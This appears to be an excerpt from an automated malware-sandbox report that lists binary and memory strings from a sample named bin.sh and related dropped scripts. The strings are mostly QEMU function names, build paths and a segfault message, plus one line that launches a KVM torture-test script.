Source: kvm.sh.8.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/crypto/aes.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_write_full
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_madvise
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: cpu_common_initfncpu_common_parse_featurescpu_common_resetcpu_common_get_memory_mappingcpu_class_initcpu_class_by_namecpu_resetcpu_dump_statisticscpu_dump_statecpu_write_elf64_notecpu_write_elf64_qemunotecpu_write_elf32_notecpu_write_elf32_qemunotecpu_get_memory_mappingcpu_paging_enabledcpu_generic_initcpu_existsRegistering `%s' which already exists
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/exec.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_logfile
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_strtoul
Source: bin.sh, 6821.1.00007ffda3af7000.00007ffda3b18000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_cond_signal
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_append () {
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_event_init
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_number